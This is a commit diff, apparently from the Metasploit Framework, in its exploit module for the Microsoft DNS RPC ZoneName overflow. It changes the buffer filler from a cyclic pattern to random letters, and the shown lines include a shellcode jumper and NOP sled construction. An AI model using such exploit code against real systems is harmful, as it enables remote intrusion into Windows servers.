Switch from pattern to alpha
git-svn-id: file:///home/svn/framework3/trunk@4679 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
a80b937638
commit
3c9007a7be
|
@ -95,7 +95,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
|||
"\x81\xef" + [-0x0604].pack("V") +
|
||||
"\xff\xd7"
|
||||
|
||||
txt = Rex::Text.pattern_create(480)
|
||||
txt = Rex::Text.text_rand_alpha(480)
|
||||
txt << make_nops(160)
|
||||
txt << jumper
|
||||
|
||||
|
|
Loading…
Reference in New Issue